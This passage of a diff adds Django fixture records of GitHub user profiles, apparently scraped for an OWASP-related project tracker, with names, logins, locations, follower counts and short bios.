"is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2991, + "fields": { + "nest_created_at": "2024-09-12T02:40:37.068Z", + "nest_updated_at": "2024-09-12T02:40:37.068Z", + "name": "Claudio Consolmagno", + "login": "ClaudioConsolmagno", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/33358623?v=4", + "company": "@getmayday ", + "location": "London", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2017-11-03T19:30:39Z", + "updated_at": "2024-05-19T12:54:31Z", + "node_id": "MDQ6VXNlcjMzMzU4NjIz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2992, + "fields": { + "nest_created_at": "2024-09-12T02:40:38.396Z", + "nest_updated_at": "2024-09-12T02:40:38.396Z", + "name": "Guillaume Lederrey", + "login": "gehel", + "email": "guillaume.lederrey@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1415765?v=4", + "company": "", + "location": "Lausanne, Switzerland", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 35, + "public_gists_count": 12, + "public_repositories_count": 109, + "created_at": "2012-02-07T11:39:09Z", + "updated_at": "2024-08-20T18:25:37Z", + "node_id": "MDQ6VXNlcjE0MTU3NjU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2993, + "fields": { + "nest_created_at": "2024-09-12T02:40:39.226Z", + "nest_updated_at": "2024-09-22T20:29:32.120Z", + "name": "", + "login": "bsellier", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/100307206?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2022-02-23T17:26:56Z", + "updated_at": "2024-09-16T15:41:47Z", + "node_id": "U_kgDOBfqRBg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2994, + "fields": { + "nest_created_at": "2024-09-12T02:40:40.060Z", + "nest_updated_at": "2024-09-12T02:40:40.060Z", + "name": "", + "login": "sjlx12345", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60878158?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2020-02-10T10:56:52Z", + "updated_at": "2024-04-17T09:37:45Z", + "node_id": "MDQ6VXNlcjYwODc4MTU4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2995, + "fields": { + "nest_created_at": "2024-09-12T02:40:40.875Z", + "nest_updated_at": "2024-09-12T02:40:40.875Z", + "name": "", + "login": "javanegmond", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7011119?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2014-03-20T13:05:37Z", + "updated_at": "2024-06-27T14:27:47Z", + "node_id": "MDQ6VXNlcjcwMTExMTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2996, + "fields": { + "nest_created_at": "2024-09-12T02:41:13.040Z", + "nest_updated_at": "2024-09-22T20:30:22.818Z", + "name": "Secure Decisions", + "login": "secdec", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32463091?v=4", + "company": "", + "location": "Northport, NY", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2017-10-02T17:06:23Z", + "updated_at": "2017-10-02T17:16:44Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjMyNDYzMDkx", + "bio": "Secure Decisions is a cybersecurity focused division of Applied Visions, Inc.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2997, + "fields": { + "nest_created_at": "2024-09-12T02:41:16.180Z", + "nest_updated_at": "2024-09-12T02:41:16.180Z", + "name": "Ozgur Alp", + "login": "ozguralp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/28699863?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 156, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2017-05-15T06:42:11Z", + "updated_at": "2024-09-11T11:22:52Z", + "node_id": "MDQ6VXNlcjI4Njk5ODYz", + "bio": "Twitter: @ozgur_bbh\r\n", + "is_hireable": false, + "twitter_username": "ozgur_bbh" + } +}, +{ + "model": "github.user", + "pk": 2998, + "fields": { + "nest_created_at": "2024-09-12T02:41:17.008Z", + "nest_updated_at": "2024-09-12T02:41:17.008Z", + "name": "", + "login": "shrirai", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65364072?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-05-14T18:18:35Z", + "updated_at": "2020-05-14T18:20:12Z", + "node_id": "MDQ6VXNlcjY1MzY0MDcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2999, + "fields": { + "nest_created_at": "2024-09-12T02:41:17.844Z", + "nest_updated_at": "2024-09-13T05:02:26.573Z", + "name": "", + "login": "bluekaka", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6761110?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-02-23T05:26:10Z", + "updated_at": "2024-05-05T10:32:38Z", + "node_id": "MDQ6VXNlcjY3NjExMTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3000, + "fields": { + "nest_created_at": "2024-09-12T02:41:20.006Z", + "nest_updated_at": "2024-09-22T20:30:27.073Z", + "name": "", + "login": "matthewD-AVI", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/35819157?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-01-25T21:39:01Z", + "updated_at": "2024-04-01T17:21:08Z", + "node_id": "MDQ6VXNlcjM1ODE5MTU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3001, + "fields": { + "nest_created_at": "2024-09-12T02:41:28.345Z", + "nest_updated_at": "2024-09-22T20:30:20.356Z", + "name": "Manuel Walder", + "login": "manuelWalder", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/93798572?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-11-05T22:19:05Z", + "updated_at": "2024-08-08T14:37:21Z", + "node_id": "U_kgDOBZdArA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3002, + "fields": { + "nest_created_at": "2024-09-12T02:41:29.749Z", + "nest_updated_at": "2024-09-22T20:30:21.810Z", + "name": "Tyler Camp", + "login": "tylercamp", + "email": "tylermatthewcamp@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3388513?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 15, + "public_gists_count": 19, + "public_repositories_count": 42, + "created_at": "2013-01-26T07:12:02Z", + "updated_at": "2024-07-04T02:25:50Z", + "node_id": "MDQ6VXNlcjMzODg1MTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3003, + "fields": { + "nest_created_at": "2024-09-12T02:41:42.364Z", + "nest_updated_at": "2024-09-12T02:41:42.364Z", + "name": "", + "login": "rlgordey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/86806492?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2021-07-01T21:42:15Z", + "updated_at": "2023-04-08T10:46:57Z", + "node_id": "MDQ6VXNlcjg2ODA2NDky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3004, + "fields": { + "nest_created_at": "2024-09-12T02:42:01.448Z", + "nest_updated_at": "2024-09-22T19:23:22.318Z", + "name": "DedSec Inside", + "login": "DedSecInside", + "email": "thepsnarayanan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20391554?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 135, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2016-07-11T04:46:14Z", + "updated_at": "2024-09-17T11:31:42Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjIwMzkxNTU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3005, + "fields": { + "nest_created_at": "2024-09-12T02:42:04.560Z", + "nest_updated_at": "2024-09-22T19:23:27.765Z", + "name": "PS Narayanan", + "login": "PSNAppz", + "email": "thepsnarayanan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4481429?v=4", + "company": "OpenG2P", + "location": "::1", + "collaborators_count": 0, + "following_count": 51, + "followers_count": 205, + "public_gists_count": 11, + "public_repositories_count": 102, + "created_at": "2013-05-20T17:45:33Z", + "updated_at": "2024-09-09T03:53:16Z", + "node_id": "MDQ6VXNlcjQ0ODE0Mjk=", + "bio": "Python, Coffee then Go(lang) \r\n|\r\nFounder @DedSecInside ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3006, + "fields": { + "nest_created_at": "2024-09-12T02:42:04.952Z", + "nest_updated_at": "2024-09-12T02:42:04.952Z", + "name": "PAVAN KALYAN S", + "login": "pavankalyan767", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/124815665?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 14, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2023-02-08T18:34:02Z", + "updated_at": "2024-08-19T16:10:05Z", + "node_id": "U_kgDOB3CJMQ", + "bio": "backend developer(django/python),AI/ML enthusiast", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3007, + "fields": { + "nest_created_at": "2024-09-12T02:42:11.011Z", + "nest_updated_at": "2024-09-22T19:23:27.451Z", + "name": "Akeem King", + "login": "KingAkeem", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13573860?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 110, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2015-07-30T15:08:23Z", + "updated_at": "2024-09-20T13:35:02Z", + "node_id": "MDQ6VXNlcjEzNTczODYw", + "bio": "A relentless learner and builder at heart with an insatiable curiosity that fuels me to work towards innovative solutions.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3008, + "fields": { + "nest_created_at": "2024-09-12T02:42:13.475Z", + "nest_updated_at": "2024-09-12T02:42:13.475Z", + "name": "Biohazard", + "login": "biohazard2117", + "email": "uttu.college.id@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/76464364?v=4", + "company": "NIT Raipur", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 44, + "created_at": "2020-12-22T04:42:04Z", + "updated_at": "2024-09-11T16:53:54Z", + "node_id": "MDQ6VXNlcjc2NDY0MzY0", + "bio": "", + "is_hireable": true, + "twitter_username": "Utkarsh34063958" + } +}, +{ + "model": "github.user", + "pk": 3009, + "fields": { + "nest_created_at": "2024-09-12T02:42:19.726Z", + "nest_updated_at": "2024-09-12T02:42:19.726Z", + "name": "", + "login": "AnonymousRonin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/131200690?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 0, + "created_at": "2023-04-18T19:14:20Z", + "updated_at": "2024-07-09T17:15:24Z", + "node_id": "U_kgDOB9H2sg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3010, + "fields": { + "nest_created_at": "2024-09-12T03:07:29.007Z", + "nest_updated_at": "2024-09-22T19:24:06.907Z", + "name": "NO MONKEY", + "login": "NO-MONKEY", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/65667199?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2020-05-20T14:09:59Z", + "updated_at": "2020-11-02T14:10:52Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjY1NjY3MTk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3011, + "fields": { + "nest_created_at": "2024-09-12T03:07:35.696Z", + "nest_updated_at": "2024-09-13T05:14:00.291Z", + "name": "", + "login": "Mattew16", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1334976?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2012-01-16T21:18:17Z", + "updated_at": "2024-05-22T08:20:53Z", + "node_id": "MDQ6VXNlcjEzMzQ5NzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3012, + "fields": { + "nest_created_at": "2024-09-12T03:07:36.625Z", + "nest_updated_at": "2024-09-12T03:07:36.625Z", + "name": "gbuday", + "login": "GergelyBuday", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3908490?v=4", + "company": "University of Sheffield", + "location": "Sheffield", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 1, + "public_gists_count": 3, + "public_repositories_count": 9, + "created_at": "2013-03-19T10:17:26Z", + "updated_at": "2024-09-10T07:44:18Z", + "node_id": "MDQ6VXNlcjM5MDg0OTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3013, + "fields": { + "nest_created_at": "2024-09-12T03:08:15.232Z", + "nest_updated_at": "2024-09-12T03:08:15.232Z", + "name": "", + "login": "rafaabc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/42503318?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 14, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2018-08-18T23:31:37Z", + "updated_at": "2024-04-15T16:03:18Z", + "node_id": "MDQ6VXNlcjQyNTAzMzE4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3014, + "fields": { + "nest_created_at": "2024-09-12T03:08:49.208Z", + "nest_updated_at": "2024-09-22T19:24:28.177Z", + "name": "Ehis Edemakhiota", + "login": "ehizman", + "email": "edemaehiz@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/23247186?v=4", + "company": "", + "location": "Lagos, Nigeria", + "collaborators_count": 0, + "following_count": 35, + "followers_count": 81, + "public_gists_count": 13, + "public_repositories_count": 115, + "created_at": "2016-11-03T21:10:23Z", + "updated_at": "2024-09-17T15:53:21Z", + "node_id": "MDQ6VXNlcjIzMjQ3MTg2", + "bio": "I write software @semicolon-africa, also contribute to FOSS and write technical tutorials in my spare time. Java programmer at heart.\r\n", + "is_hireable": true, + "twitter_username": "ehizman_tutorEd" + } +}, +{ + "model": "github.user", + "pk": 3015, + "fields": { + "nest_created_at": "2024-09-12T03:09:17.748Z", + "nest_updated_at": "2024-09-22T19:24:30.711Z", + "name": "", + "login": "tkomlodi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6026319?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2013-11-24T23:33:35Z", + "updated_at": "2024-06-21T14:34:23Z", + "node_id": "MDQ6VXNlcjYwMjYzMTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3016, + "fields": { + "nest_created_at": "2024-09-12T03:09:19.854Z", + "nest_updated_at": "2024-09-12T03:09:19.854Z", + "name": "", + "login": "massot-c", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51371714?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-06-04T13:31:20Z", + "updated_at": "2024-02-08T10:41:00Z", + "node_id": "MDQ6VXNlcjUxMzcxNzE0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3017, + "fields": { + "nest_created_at": "2024-09-12T03:09:28.183Z", + "nest_updated_at": "2024-09-22T19:24:33.864Z", + "name": "", + "login": "richard66033", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/104577745?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-04-28T14:23:27Z", + "updated_at": "2023-11-13T14:34:57Z", + "node_id": "U_kgDOBju60Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3018, + "fields": { + "nest_created_at": "2024-09-12T03:09:34.959Z", + "nest_updated_at": "2024-09-22T19:24:39.988Z", + "name": "", + "login": "13Anthony", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/147270663?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-10-07T17:16:45Z", + "updated_at": "2024-05-30T11:20:11Z", + "node_id": "U_kgDOCMcsBw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3019, + "fields": { + "nest_created_at": "2024-09-12T03:09:39.706Z", + "nest_updated_at": "2024-09-22T19:24:35.461Z", + "name": "", + "login": "SeheX", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/147345361?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2023-10-08T19:50:47Z", + "updated_at": "2023-12-17T14:02:03Z", + "node_id": "U_kgDOCMhP0Q", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3020, + "fields": { + "nest_created_at": "2024-09-12T03:09:46.009Z", + "nest_updated_at": "2024-09-22T19:24:24.773Z", + "name": "", + "login": "kamini-saini", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31923365?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-09-13T11:22:39Z", + "updated_at": "2024-09-04T14:22:04Z", + "node_id": "MDQ6VXNlcjMxOTIzMzY1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3021, + "fields": { + "nest_created_at": "2024-09-12T03:10:07.698Z", + "nest_updated_at": "2024-09-12T03:10:07.698Z", + "name": "Leiber Bertel", + "login": "leiberbertel", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/108705437?v=4", + "company": "Quipux", + "location": "Medellín, Colombia", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2022-07-05T01:28:16Z", + "updated_at": "2024-08-10T16:09:26Z", + "node_id": "U_kgDOBnq2nQ", + "bio": "𝑭𝒖𝒍𝒍 𝒔𝒕𝒂𝒄𝒌 𝒅𝒆𝒗𝒆𝒍𝒐𝒑𝒆𝒓", + "is_hireable": false, + "twitter_username": "BertelLeiber" + } +}, +{ + "model": "github.user", + "pk": 3022, + "fields": { + "nest_created_at": "2024-09-12T03:10:11.845Z", + "nest_updated_at": "2024-09-12T03:10:11.845Z", + "name": "", + "login": "SelectBillyFromC", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/61947286?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2020-03-08T18:55:11Z", + "updated_at": "2023-10-11T02:36:47Z", + "node_id": "MDQ6VXNlcjYxOTQ3Mjg2", + "bio": "BU varsity coder | \r\n\r\nI like music 🎹 and building 🏗️ things! | \r\nSELECT me 💯", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3023, + "fields": { + "nest_created_at": "2024-09-12T03:10:21.453Z", + "nest_updated_at": "2024-09-12T03:10:21.453Z", + "name": "Vaibhav Shah", + "login": "vaibhav0k", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72647248?v=4", + "company": "Bajaj Finserv", + "location": "Pune", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2020-10-10T08:00:40Z", + "updated_at": "2024-04-25T04:33:33Z", + "node_id": "MDQ6VXNlcjcyNjQ3MjQ4", + "bio": "CSE undergrad at VIT Vellore | VIT'24", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3024, + "fields": { + "nest_created_at": "2024-09-12T03:10:22.332Z", + "nest_updated_at": "2024-09-12T03:10:22.332Z", + "name": "", + "login": "bperry-mf", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/90418293?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-09-09T19:14:51Z", + "updated_at": "2023-08-08T00:35:04Z", + "node_id": "MDQ6VXNlcjkwNDE4Mjkz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3025, + "fields": { + "nest_created_at": "2024-09-12T03:10:37.863Z", + "nest_updated_at": "2024-09-22T19:32:04.788Z", + "name": "OSHP", + "login": "oshp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/21014071?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 48, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2016-08-13T21:56:03Z", + "updated_at": "2024-08-26T11:35:10Z", + "node_id": "MDEyOk9yZ2FuaXphdGlvbjIxMDE0MDcx", + "bio": "OWASP Secure Headers Project", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3026, + "fields": { + "nest_created_at": "2024-09-12T03:11:18.740Z", + "nest_updated_at": "2024-09-22T20:26:56.237Z", + "name": "Gustavo Arreaza", + "login": "VascoArreaza", + "email": "gustavoskrill@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9584736?v=4", + "company": "Owasp", + "location": "Chile", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2014-11-06T04:21:32Z", + "updated_at": "2024-09-03T11:31:40Z", + "node_id": "MDQ6VXNlcjk1ODQ3MzY=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3027, + "fields": { + "nest_created_at": "2024-09-12T03:11:27.138Z", + "nest_updated_at": "2024-09-22T20:30:32.298Z", + "name": "Izar Tarandach", + "login": "izar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/368769?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 75, + "public_gists_count": 2, + "public_repositories_count": 22, + "created_at": "2010-08-18T18:18:33Z", + "updated_at": "2024-09-10T21:09:07Z", + "node_id": "MDQ6VXNlcjM2ODc2OQ==", + "bio": "Just that guy.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3028, + "fields": { + "nest_created_at": "2024-09-12T03:11:30.418Z", + "nest_updated_at": "2024-09-22T20:30:34.841Z", + "name": "", + "login": "colesmj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/39390458?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-05-17T23:27:50Z", + "updated_at": "2023-06-25T14:01:45Z", + "node_id": "MDQ6VXNlcjM5MzkwNDU4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3029, + "fields": { + "nest_created_at": "2024-09-12T03:11:32.052Z", + "nest_updated_at": "2024-09-22T20:30:38.804Z", + "name": "", + "login": "nozmore", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12926168?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 3, + "public_repositories_count": 0, + "created_at": "2015-06-16T20:29:51Z", + "updated_at": "2024-09-19T12:26:42Z", + "node_id": "MDQ6VXNlcjEyOTI2MTY4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3030, + "fields": { + "nest_created_at": "2024-09-12T03:11:52.508Z", + "nest_updated_at": "2024-09-22T20:30:38.491Z", + "name": "Mike Jarrett", + "login": "mikejarrett", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1672173?v=4", + "company": "", + "location": "London, UK", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2012-04-23T20:06:27Z", + "updated_at": "2024-08-20T12:00:05Z", + "node_id": "MDQ6VXNlcjE2NzIxNzM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3031, + "fields": { + "nest_created_at": "2024-09-12T03:11:56.571Z", + "nest_updated_at": "2024-09-22T20:30:32.947Z", + "name": "Per Østergaard", + "login": "per-oestergaard", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6398503?v=4", + "company": "@LEGO ", + "location": "Billund, Denmark", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2014-01-14T10:44:07Z", + "updated_at": "2024-09-04T19:39:45Z", + "node_id": "MDQ6VXNlcjYzOTg1MDM=", + "bio": "Principal Engineer, Digital Security", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3032, + "fields": { + "nest_created_at": "2024-09-12T03:11:58.219Z", + "nest_updated_at": "2024-09-22T20:30:37.819Z", + "name": "", + "login": "jharnois4512", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/36828732?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2018-02-26T00:32:30Z", + "updated_at": "2024-08-24T17:27:49Z", + "node_id": "MDQ6VXNlcjM2ODI4NzMy", + "bio": "Computer Science/Psychology major\r\nCyber Security Concentration ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3033, + "fields": { + "nest_created_at": "2024-09-12T03:11:59.056Z", + "nest_updated_at": "2024-09-22T20:30:30.906Z", + "name": "Jon Renshaw", + "login": "jmrenshaw", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23117233?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2016-10-28T08:53:38Z", + "updated_at": "2024-09-06T10:03:39Z", + "node_id": "MDQ6VXNlcjIzMTE3MjMz", + "bio": "Cyber security and network engineering research.\r\nDirector of cyber security research services for NCC Group", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3034, + "fields": { + "nest_created_at": "2024-09-12T03:11:59.858Z", + "nest_updated_at": "2024-09-12T03:12:00.664Z", + "name": "", + "login": "amrmp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37609110?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-03-21T05:10:22Z", + "updated_at": "2024-08-28T00:38:03Z", + "node_id": "MDQ6VXNlcjM3NjA5MTEw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 3035, + "fields": { + "nest_created_at": "2024-09-12T03:12:01.483Z", + "nest_updated_at": "2024-09-12T03:12:01.483Z", + "name": "黄承开", + "login": "highkay", + "email": "highkay@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/443490?v=4", + "company": "@afc-falcon", + "location": "Shanghai.China", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 59, + "public_gists_count": 0, + "public_repositories_count": 74, + "created_at": "2010-10-18T05:41:27Z", + "updated_at": "2024-08-22T02:02:09Z", + "node_id": "MDQ6VXNlcjQ0MzQ5MA==", + "bio": "Fullstack crafter.", + "is_hireable": false, + "twitter_username": "highkay" + } +}, +{ + "model": "github.user", + "pk": 3036, + "fields": { 